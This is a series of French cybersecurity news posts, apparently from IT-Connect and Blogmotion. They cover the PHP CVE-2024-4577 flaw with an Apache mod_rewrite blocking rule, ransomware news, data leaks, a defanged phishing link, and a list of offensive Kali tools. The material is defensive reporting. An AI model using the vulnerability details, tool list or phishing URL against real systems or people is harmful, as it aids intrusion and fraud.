Des chiffres alarmants et qui montrent qu'il faut être vigilant avant d'installer une extension sur sa machine. Il est temps que Microsoft améliore son processus de validation et effectue un nettoyage sur cette marketplace... En attendant, l'outil d'analyse des chercheurs en sécurité devrait être publié dans les prochaines semaines.

Finalement, l'ensemble des marketplaces et plateformes de dépôts officielles peuvent être utilisées pour distribuer des logiciels malveillants : PyPI pour les projets Python, Docker Hub pour les images de conteneurs, ou encore le catalogue de Visual Studio Code sont des exemples parmi d'autres....

Source

The post La Marketplace de Visual Studio Code est truffée d’extensions malveillantes installées par millions ! first appeared on IT-Connect.

Une nouvelle faille de sécurité critique a été découverte dans PHP : CVE-2024-4577 ! En l'exploitant, un attaquant peut exécuter du code malveillant à distance sur le serveur Windows utilisé en tant que serveur Web. Faisons le point sur cette menace.

L'équipe de développement de PHP a corrigé plusieurs failles de sécurité dans son moteur de scripts PHP. L'une de ces vulnérabilités, associées à la référence CVE-2024-4577 mérite une attention particulière.

Découverte par le chercheur en sécurité Orange Tsai de DEVCORE, cette vulnérabilité d'injection d'arguments dans CGI affecte toutes les versions de PHP lorsque ce dernier est installé sur un serveur Windows. Pour être plus précis, toutes les versions de PHP, de 5.X à la dernière version 8.3.X sont vulnérables. Le problème, c'est que de nombreuses versions vulnérables ne sont plus prises en charge et ne pourront pas bénéficier d'un correctif de sécurité.

"Lors de l'implémentation de PHP, l'équipe n'a pas remarqué la fonctionnalité Best-Fit de conversion d'encodage dans le système d'exploitation Windows. Cette omission permet à des attaquants non authentifiés de contourner la protection précédente de CVE-2012-1823 par des séquences de caractères spécifiques.", précise le chercheur en sécurité dans son rapport.

Vous l'aurez compris, cette nouvelle vulnérabilité permet d'outrepasser un correctif de sécurité introduit il y a plus de 10 ans pour corriger la faille de sécurité CVE-2012-1823 présente dans PHP-CGI. En exploitant cette vulnérabilité, un attaquant peut compromettre le serveur Web.

Qui est vulnérabilité à cette faille de sécurité ?

Au-delà de la version de PHP utilisée, pour être vulnérable à la faille de sécurité CVE-2024-4577, le moteur de scripts PHP doit être utilisé sur Windows. L'article évoque un cas d'utilisation de PHP avec un serveur Web XAMPP sous Windows, mais ce n'est pas le seul moyen d'utiliser PHP-CGI sur Windows. En effet, il est tout à fait possible d'avoir un serveur IIS avec PHP-CGI actif, et dans ce cas, le serveur Web est également vulnérable. Nous pourrions aussi citer WAMP.

De plus, bien que cette vulnérabilité soit liée à PHP-CGI, elle peut être exploitée même si PHP n'est pas configuré en mode CGI. La seule condition, c'est que les exécutables PHP ("php.exe" ou "php-cgi.exe") soient stockés dans des répertoires accessibles par le serveur web. Ceci est la configuration par défaut de XAMPP, donc il y a probablement une grande majorité de serveurs XAMPP vulnérables.

Ce problème de sécurité est exploitable lorsque l'une de ces "locales" est utilisée dans la configuration de PHP : chinois traditionnel, chinois simplifié et japonais. Attention, les autres "locales" sont potentiellement vulnérables : Orange Tsai affirme qu'il n'a pas évalué toutes les configurations possibles.

Remarque : CGI pour Common Gateway Interface, est une interface utilisée sur les serveurs Web pour permettre l'exécution de programmes externes via des requêtes HTTP. Ceci est notamment utile au bon fonctionnement de certaines applications.

Comment se protéger de la CVE-2024-4577 ?

Le meilleur moyen de se protéger de cette vulnérabilité, c'est de passer sur les dernières de PHP, publiées il y a quelques jours, car elles contiennent un correctif. Il s'agit des versions suivantes : PHP 8.3.8, PHP 8.2.20, et PHP 8.1.29.

Si vous ne pouvez pas mettre à jour PHP maintenant, ou que vous utilisez une version de PHP qui n'est plus supportée, il existe une solution. En effet, une règle de réécriture d'URL basée sur l'utilisation du module PHP "mod_rewrite" permet de bloquer les attaques (mais ceci s'appliquerait uniquement aux locales évoquées ci-dessus).

RewriteEngine On
RewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? – [F,L]

Par ailleurs, à la place de cette règle, si vous êtes certain que vous n'utilisez pas PHP-CGI et que vous utilisez XAMPP, vous pouvez désactiver la fonctionnalité sur votre serveur Web. Éditez le fichier suivant :

C:/xampp/apache/conf/extra/httpd-xampp.conf

Puis, commentez la ligne présentée ci-dessous en ajoutant un "#" au début de la ligne :

#ScriptAlias /php-cgi/ "C:/xampp/php/"

Enfin, sachez qu'un exploit PoC est déjà disponible (voir cette page). Cette vulnérabilité représente un risque important, donc mettez à jour si vous le pouvez.

Source

The post Cette faille de sécurité critique dans PHP fait trembler les serveurs Web sous Windows first appeared on IT-Connect.

Waked nous propose un contenu assez original sur le rejeu de trames sur le bus CAN d'une voiture. Il est vrai qu'il existe peu de contenu français sur ce sujet donc j'en profite pour vous partager ce contenu :

Je suppose que tous les véhicules n'ont pas leur informations qui circulent comme ça en clair.  Cela me rappelle cette affaire du vol de voiture par les phares qui sont reliés au bus CAN.

Vous n'aimez pas le RSS : abonnez-vous par email
Vous devriez me suivre sur Twitter : @xhark

---

Article original écrit par Mr Xhark publié sur Blogmotion le 08/06/2024 | Pas de commentaire |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Cet article [Voiture] Ouvrir les portes avec le bus CAN 🚗 provient de : on Blogmotion.

Le FBI continue sa lutte contre le gang de ransomware LockBit et ses affiliés : les autorités américaines auraient en leur possession pas moins de 7 000 clés de déchiffrement de LockBit 3.0. Si vous avez été victime de ce ransomware, vous êtes invité à prendre contact avec le FBI...

La bonne nouvelle du jour est probablement est liée à l'opération Cronos menée par les forces de l'ordre de 11 pays en février 2024. D'ailleurs, lors de cette opération importante, les autorités étaient parvenues à mettre la main sur 34 serveurs de l'infrastructure LockBit ainsi qu'à des clés de chiffrement (1000 dans un premier temps, puis environ 2500 au total). Désormais, le FBI détiendrait une quantité beaucoup plus importante de clé de déchiffrement...

En effet, à l'occasion d'une conférence sur la cybersécurité organisée à Boston aux États-Unis, Bryan Vorndan, a dévoilé que le FBI détenait 7 000 clés de déchiffrement pouvant profiter aux victimes du ransomware LockBit 3.0 : "En outre, grâce à la perturbation continue de LockBit, nous disposons désormais de plus de 7 000 clés de déchiffrement et nous pouvons aider les victimes à récupérer leurs données et à se remettre en ligne.", peut-on lire. La transcription de son allocution est disponible sur cette page.

Désormais, le message du FBI est clair : si vous avez été victime de LockBit, vous devez entrer en contact avec les autorités, car une clé de déchiffrement est sûrement disponible pour vous permettre de déchiffrer vos données gratuitement. "Nous nous adressons aux victimes connues de LockBit et encourageons toute personne qui pense en avoir été victime à se rendre sur le site de l'Internet Crime Complaint Center, à l'adresse ic3.gov.", a précisé Bryan Vorndan du FBI.

Finalement, malgré tous les efforts des forces de l'ordre, et l'identification récente de LockBitSupp, l'un des leaders du gang de ransomware LockBit, ce groupe de cybercriminels reste toujours très actif et redoutable. Espérons que de nombreuses victimes puissent bénéficier de ces clés de déchiffrement.

Source

The post Ransomware LockBit 3.0 : le FBI détient 7 000 clés de déchiffrement ! first appeared on IT-Connect.

À partir d'aujourd'hui, jeudi 6 juin 2024, le portail Orange Cybersecure est accessible à tout le monde ! Son objectif : vous permettre de vérifier facilement et rapidement les liens douteux que vous êtes susceptible de recevoir par e-mail ou SMS.

Avec la solution Orange Cybersecure, les français vont pouvoir vérifier si un lien ("URL") est dangereux ou non. Pour mettre au point cet outil, Orange s'est appuyé sur l'expertise de sa filiale Orange Cyberdefense, spécialisée dans la cybersécurité.

"Sur le portail Cybersecure, toute personne, quel que soit son opérateur, pourra vérifier, gratuitement, par un simple copier/coller, la légitimité d’un site, d’un lien, d’un email ou d’un SMS qui lui semble suspect.", peut-on lire dans le communiqué de presse d'Orange.

Le principe est simple : vous copiez-coller le lien à vérifier, et s'il est déjà connu par la base de données du service, alors la réponse est immédiate. Sinon, cela implique une analyse de la part des experts d'Orange Cyberdefense avant d'avoir une réponse. Ce service sera connecté à une intelligence artificielle capable d'apprendre au fur et à mesure que la base est enrichie par les utilisateurs.

"Comme une application communautaire, plus le moteur est utilisé plus la base de données s’enrichit au bénéfice de tous les français.", précise Orange. Ce service participatif me fait penser au service Waze où les automobilistes peuvent signaler des événements, bien que ce soit dans un tout autre registre.

L'accès à ce service en ligne sera gratuit, bien qu'Orange prévoit une offre payante pour ses clients Orange et Sosh.

Une offre payante pour les clients Orange et Sosh

Le pack Orange Cybersecure est proposé pour ceux qui veulent une solution de protection plus complète. Proposé à 7 euros par mois et sans engagement, cet abonnement intègre la solution de sécurité Orange Cybersecure pour lutter "contre les messages malveillants comme les arnaques sur internet, virus, sites frauduleux, usurpation d’identité etc.", précise Orange qui présente sa solution comme étant plus qu'un simple antivirus.

Un seul abonnement peut être utilisé pour protéger jusqu'à 10 appareils d'un même foyer : tablette, ordinateur, smartphone. Cette offre donne aussi accès à un accompagnement où l'utilisateur peut solliciter l'aide des spécialistes Cyber d'Orange en cas de doute.

"Des spécialistes Cyber qui répondent et les accompagnent 7 jours sur 7 en cas de doute sur la fiabilité d’un site ou d’une application, de piratage de données, de fraude avérée, une aide à l’installation ou toutes autres questions.", peut-on lire.

Après avoir conquis les entreprises, Orange souhaite séduire les particuliers avec sa filiale Orange Cyberdefense. Cette nouvelle offre Cybersecure est lancée en France pour le moment, mais elle devrait être lancée en Europe par la suite, de façon progressive.

Pour tester ce nouveau service, rendez-vous sur cette page :

• Orange Cybersecure - Service en ligne

Comment vérifier si un lien est malveillant avec Orange Cybersecure ?

Comme le montre l'image ci-dessous, il suffit de se rendre sur le portail Orange Cybersecure, de copier-coller le lien à vérifier puis d'appuyer sur le bouton "Vérifier la fiabilité". Après avoir vérifié un captcha, le verdict tombe !

J'ai fait un test avec le lien suivant, associé à un e-mail de phishing aux couleurs du Crédit Mutuel et que j'ai reçu hier midi.

[https://]tracking-clientprofessionel[.]com/S4FD5sf

Voici l'e-mail en question :

Le portail Orange Cybersecure m'indique, qu'en effet, il s'agit bien d'un lien malveillant. À noter également la source "avis fourni par Google", qui laisse entendre que ce lien a déjà été reporté par d'autres utilisateurs.

J'ai fait un autre test avec le texte d'un e-mail ne contenant pas de liens, mais une pièce jointe malveillante, et le portail m'a retourné une erreur.

En complément, le portail donne accès à différents guides et articles pour accompagner les internautes afin de les sensibiliser et les former aux risques de la cybersécurité. Orange semble même également proposer des ateliers en ligne, accessible sur inscription. Par exemple, il y a un atelier nommé "Atelier : Eviter les arnaques en ligne - atelier en ligne".

Qu'en pensez-vous ?

The post Phishing : vérifiez les liens douteux avec le portail Orange Cybersecure first appeared on IT-Connect.

L'Offensive Security a publié la deuxième version de l'année 2024 de sa distribution Kali Linux ! L'occasion de faire le point sur les changements apportés à Kali Linux 2024.2, ainsi que sur les 18 nouveaux outils !

• Kali Linux 2024.1 est disponible ! Quelles sont les nouveautés ?

Le bug de l'an 2038

Le bug de l'an 2038 a été corrigé dans Kali Linux ! Il s'agit d'un problème similaire au bug de l'an 2000 qui affecte les systèmes informatiques qui comptent le temps en secondes depuis le 1er janvier 1970. C'est notamment le cas de différents systèmes d'exploitation et logiciels, dont les systèmes Linux.

Ce bug doit se déclencher le 19 janvier 2038 à 3 heures 14 minutes et 8 secondes, et à ce moment-là, les systèmes affectés par le bug considéreront alors être le 13 décembre 1901 à 20 heures 45 minutes et 52 secondes. Un retour en arrière brutal et problématique, bien entendu.

Ceci est appelé la transition "t64" : "Pour éviter le problème de l'an 2038, la taille du type time_t a dû être modifiée pour être de 64 bits sur les architectures où elle était de 32 bits.", peut-on lire sur le site de Kali Linux.

Les nouveaux outils de Kali Linux 2024.2

Cette nouvelle version est très riche en nouveaux outils, puisqu'il y a eu 18 nouveaux outils ajoutés à la distribution Kali Linux 2024.2.

Voici la liste de ces outils :

• autorecon - Outil de reconnaissance réseau multi-thread, pour énumérer les services.
• coercer - Un script Python pour forcer un serveur Windows à s'authentifier sur une machine arbitraire.
• dploot - Réécriture en Python de SharpDPAPI.
• getsploit - Utilitaire en ligne de commande pour rechercher et télécharger des exploits.
• gowitness - Utilitaire de capture d'écran web utilisant Chrome Headless, écrit en Golang.
• horst - Outil de balayage radio pour le Wi-Fi.
• ligolo-ng - Outil de tunneling/pivoting avancé et utilisant une interface TUN.
• mitm6 - Pwning IPv4 via IPv6 (réponse aux messages DHCPv6).
• netexec - Outil d'exploitation de services réseau aidant à évaluer la sécurité des grands réseaux.
• pspy - Surveiller les processus Linux sans permissions root.
• pyinstaller - Compile les programmes Python en exécutables autonomes.
• pyinstxtractor - Extracteur PyInstaller.
• sharpshooter - Framework de génération de payload.
• sickle - Outil de développement de payload.
• snort - Système de détection d'intrusion réseau.
• sploitscan - Rechercher des informations sur les CVE, à partir de plusieurs bases officielles.
• vopono - Exécuter des applications via des tunnels VPN avec des espaces de noms réseau temporaires.
• waybackpy - Accéder à l'API de la Wayback Machine en utilisant Python.

Enfin, l'équipe de Kali Linux a mis à jour les environnements de bureau Xfce et GNOME. Ceci se traduit par le passage à GNOME 46, ainsi qu'une mise à jour de Xfce particulièrement pour les modes Kali-Undercover et HiDPI.

Pour obtenir des informations supplémentaires, consultez l'annonce officielle sur le site de Kali.

The post Kali Linux 2024.2 : 18 nouveaux outils et correction du bug de l’an 2038 first appeared on IT-Connect.

Les environnements VMware ESXi sont pris pour cible par une nouvelle variante du ransomware TargetCompany, qui vient s'ajouter à la liste des menaces capables de chiffrer les VM des hyperviseurs de VMware. Faisons le point.

Le ransomware TargetCompany, aussi connu sous les noms de Mallox, FARGO et Tohnichi, a été repéré pour la première fois en juin 2021. Dans un premier temps, il a surtout été utilisé pour mener des attaques contre les serveurs de gestion de base de données, que ce soit MySQL, SQL Server ou encore Oracle, en Corée du Sud, en Thaïlande, en Inde et à Taïwan.

Puis, en février 2022, Avast a publié un outil de déchiffrement pour TargetCompany afin d'aider les victimes de ce ransomware à récupérer leurs données gratuitement. Malgré ce coup porté par Avast, le gang de ransomware TargetCompany est rapidement revenu sur le devant de la scène... Notamment en s'attaquant aux serveurs Windows.

Mais, désormais, Trend Micro nous apprend qu'une nouvelle variante de TargetCompany pour Linux cible particulièrement les hyperviseurs VMware ESXi.

VMware ESXi dans le viseur du ransomware TargetCompany

C'est par l'intermédiaire d'un script shell exécuté sur l'hôte compromis que le logiciel malveillant effectue un ensemble de vérifications, pour déterminer sur quel environnement il se situe. Il cherche à déterminer s'il s'exécute sur un serveur VMware ESXi grâce à l'exécution de la commande "uname" à la recherche du mot clé "vmkernel".

"Le groupe de ransomwares TargetCompany emploie désormais une nouvelle variante Linux qui utilise un script shell personnalisé comme moyen de diffusion et d'exécution de la charge utile, une technique que l'on ne retrouvait pas dans les variantes précédentes.", précise Trend Micro dans son rapport.

En complément, il génère un fichier nommé "TargetInfo.txt" qui recense des informations sur la victime telles que le nom d'hôte, l'adresse IP, l'OS du serveur, l'utilisateur utilisé par le malware, etc.... Et ce fichier est envoyé vers le serveur C2 des attaquants.

S'il est exécuté sur un hyperviseur VMware ESXi, le ransomware passe à l'action dans le but de chiffrer les machines virtuelles. TargetCompany chiffre tous les fichiers relatifs aux machines virtuelles : VMDK, VMEM, VSWP, VMX, VMSN, NVRAM. Les fichiers chiffrés héritent de l'extension ".locked".

Enfin, une demande de rançon nommée "HOW TO DECRYPT.txt" est déposée sur le serveur et le malware termine en supprimant ses traces pour rendre plus difficile les futures investigations. "Une fois que le ransomware a exécuté sa routine, le script supprime la charge utile TargetCompany à l'aide de la commande "rm -f x".", précise Trend Micro.

Consultez le rapport de Trend Micro pour obtenir des détails supplémentaires, notamment les indicateurs de compromission et les URL utilisées par les attaquants.

Source

The post Une nouvelle variante Linux du ransomware TargetCompany cible VMware ESXi ! first appeared on IT-Connect.

L'enseigne de prêt-à-porter française Zadig & Voltaire est victime d'une importante fuite de données : un cybercriminel a publié une base de données avec les données personnelles de plus de 600 000 clients. Faisons le point.

Rappel - Créée en 1997, Zadig & Voltaire est une marque française de prêt-à-porter, aussi bien pour les femmes que pour les hommes.

Ce mercredi 5 juin, au petit matin, un cybercriminel a publié sur un forum de hacking une base de données appartenant à l'enseigne de prêt-à-porter Zadig & Voltaire. Il s'agit de données publiées sur BreachForums, la principale "place de marché" pour l'achat et la revente de données issues de cyberattaques. Preuve que BreachForums est bien de retour après avoir été malmené par les forces de l'ordre ces dernières semaines.

Cette fuite de données contient les données personnelles de 638 726 clients de l'enseigne française. Selon les informations fournies par le cybercriminel à l'origine de la divulgation des données, ces données auraient été volées en novembre 2023. Ceci laisse entendre que la cyberattaque s'est déroulée dans les jours ou semaines précédant le vol de données.

À quoi correspondent ces données personnelles ?

Dans cette base de données, nous retrouvons diverses informations au sujet des clients de Zadig & Voltaire, notamment des noms et prénoms, des adresses e-mails, des numéros de téléphone, des adresses postales, ainsi que des dates de naissance. C'est typiquement le genre d'informations que l'on retrouve dans un fichier client.

Si vous êtes client de Zadig & Voltaire, nous vous recommandons de modifier le mot de passe de votre compte client, par précaution. Méfiez-vous également des e-mails que vous recevez, car une campagne de phishing pourrait être organisée à partir de ces informations.

En 2024, ce n'est pas la première enseigne de prêt-à-porter à subir une cyberattaque associée à une fuite de données. En avril 2024, c'est la marque "Le Slip français" qui a été victime d'un incident similaire. Un peu plus tôt dans l'année, c'était au tour d'une filiale de l'enseigne Benetton.

Source

The post Cyberattaque Zadig & Voltaire : les données personnelles de 600 000 clients publiées sur le Dark Web first appeared on IT-Connect.

Un nouvel ensemble de 361 millions d'adresses e-mails a été ajouté au service en ligne Have I Been Pwned ! De quoi vous permettre de vérifier si vos identifiants sont présents dans cette liste d'informations collectées à partir de canaux Telegram. Faisons le point.

Un chercheur en sécurité anonyme a transféré à Troy Hunt, le créateur du site Have I Been Pwned (HIBP), un ensemble de fichiers représentants 122 Go de données. Cet ensemble de données correspond à plus de 1 700 fichiers provenant de 518 canaux Telegram différents. Il s'agit d'une action de scraping ("moissonnage") effectuée par ce chercheur en sécurité.

Au total, ces fichiers contiennent pas moins de 361 millions d'adresses e-mails uniques, dont 151 millions d'adresses e-mails ajoutées pour la première fois sur le site Have I Been Pwned !

À quoi correspondent ces identifiants ? Sont-ils légitimes ?

Ces identifiants peuvent provenir d'une fuite de données suite à une intrusion sur un système par un cybercriminel, à la collecte d'identifiants effectuée par un malware infostealer, à du credential stuffing, etc... Ce qui est certain, c'est que ces identifiants circulent sur des canaux cybercriminels de Telegram. Les pirates n'hésitent pas à divulguer ces identifiants pour accroître leur popularité.

Les données comprennent des identifiants de connexion regroupés par service (par exemple, Gmail, Yahoo, etc.) ou par pays. Aucun site ou service n'est susceptible d'être épargné, notamment s'il s'agit d'un infostealer qui a exfiltré les mots de passe enregistrés dans un navigateur Web.

Tous les fichiers correspondant à cette fuite de 361 millions d'identifiants ne sont pas structurés de la même façon. Il y a des combinaisons d'adresse e-mail et de mot de passe, tandis que d'autres fichiers intègrent l'URL du service en plus de l'adresse e-mail et du mot de passe ! Certains fichiers contiennent des dizaines de millions de lignes.

Troy Hunt a passé du temps à analyser ces données, notamment pour déterminer si elles sont légitimes, bien qu'il soit impossible de vérifier l'ensemble des identifiants.

Le résultat est clair : de nombreuses adresses e-mails présentes concernées par une fuite sont correctement associées au site web mentionné dans les fichiers de données fournit par le chercheur en sécurité. Autrement dit, les identifiants distribués sur ces canaux Telegram sont légitimes, au moins pour une partie.

Pour en savoir plus, vous pouvez consulter l'article publié par Troy Hunt. Pour vérifier si vous êtes affecté, rendez-vous sur le service de vérification HIBP.

Source

The post 361 millions de comptes volés divulgués sur Telegram ! Êtes-vous concerné ? first appeared on IT-Connect.

Kaspersky a publié un nouvel outil gratuit pour analyser les systèmes Linux à la recherche de cybermenaces connues ! Le nom de cet outil : Kaspersky Virus Removal Tool (KVRT). Faisons le point.

Disponible depuis plusieurs années, l'outil Kaspersky Virus Removal Tool était jusqu'alors réservé aux utilisateurs de Windows. L'éditeur Kaspersky a pris la décision de développer une version pour Linux, désormais disponible.

Kaspersky estime que les entreprises ne protègent pas suffisamment leurs machines sous Linux, pensant qu'elles sont immunisées contre les menaces lorsqu'une machine est exécutée avec une distribution Linux. "C'est pourquoi nous avons lancé un produit gratuit dédié qui permet de vérifier les ordinateurs Linux contre les menaces modernes : Kaspersky Virus Removal Tool (KVRT) pour Linux.", peut-on lire sur le site de Kaspersky.

À quoi sert Kaspersky Virus Removal Tool pour Linux ?

Ce nouvel outil ne surveille pas le système en temps réel, mais il est plutôt là pour effectuer une analyse sur une machine à la recherche de menaces déjà présentes. Autrement dit, il sert à effectuer une recherche de logiciels malveillants sur Linux, tout en proposant le nettoyage des menaces détectées. "Il peut détecter à la fois les logiciels malveillants et les adwares, ainsi que les programmes légitimes pouvant être utilisés pour des attaques.", précise Kaspersky.

Pour rechercher les menaces, Kaspersky Virus Removal Tool effectue une analyse en profondeur du système puisqu'il va s'intéresser à tous les fichiers du système, mais pas seulement. Kaspersky apporte des précisions à ce sujet : "Notre application peut analyser la mémoire système, les objets de démarrage, les secteurs d'amorçage et tous les fichiers du système d'exploitation à la recherche de logiciels malveillants connus. Elle analyse les fichiers de tous les formats, y compris ceux archivés."

Comment utiliser Kaspersky Virus Removal Tool sur Linux ?

Cet outil est compatible avec différentes distributions Linux, dont Debian, AlmaLinux, Oracle Linux, Ubuntu, ou encore Red Hat Enterprise Linux. La liste complète des distributions disponibles et des prérequis est disponible sur cette page.

Il doit être téléchargé et exécuté depuis la machine sur laquelle l'analyse doit être effectuée. Kaspersky explique qu'il s'agit d'une application portable, qui ne nécessite pas d'installation. Il est également précisé que la base de l'application n'est pas mise à jour de façon automatique : il convient de télécharger la dernière version, pour détecter les menaces les plus récentes, directement depuis le site de l'éditeur.

Cette application est adaptée aux machines Linux avec ou sans interface graphique : "L'application peut être exécutée via une interface graphique ou via une ligne de commande. Mais vous ne pouvez la lancer que manuellement — il est impossible de configurer une analyse programmée.", peut-on lire.

Enfin, pour bénéficier d'une analyse complète du système, il est recommandé de lancer l'outil à partir du compte "root" ou d'un compte privilégié (via "sudo"). Sinon, l'outil pourrait passer à côté de certaines menaces s'il ne peut pas analyser certaines parties de la machine à cause d'un manque de permissions.

Pour en savoir plus, vous pouvez consulter cette page, tandis que le téléchargement s'effectue à partir de cette page en cliquant sur le lien "Show other platforms".

Qu'en pensez-vous ?

The post Kaspersky lance un outil gratuit pour analyser Linux à la recherche de menaces connues ! first appeared on IT-Connect.